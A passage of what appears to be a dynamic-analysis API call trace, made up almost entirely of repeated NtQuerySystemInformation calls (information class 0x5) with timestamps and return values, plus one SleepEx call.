ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.714] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.715] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.716] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.719] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.720] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.728] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.730] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.731] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.734] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.735] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.741] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.745] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.746] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.747] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.765] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.766] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.770] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.777] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.778] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.792] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.797] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.806] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.807] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.808] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.812] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.825] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe490) returned 0x0 [0218.826] SleepEx (dwMilliseconds=0x9c4, bAlertable=1) returned 0x0 [0221.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.615] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.617] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.618] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.620] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.621] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.633] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3256130, Length=0x20000, ResultLength=0x53ff7ec | out: SystemInformation=0x3256130, ResultLength=0x53ff7ec*=0xe760) returned 0x0 [0221.634] NtQuerySystemInformation (in: SystemInformationClass=0x5, 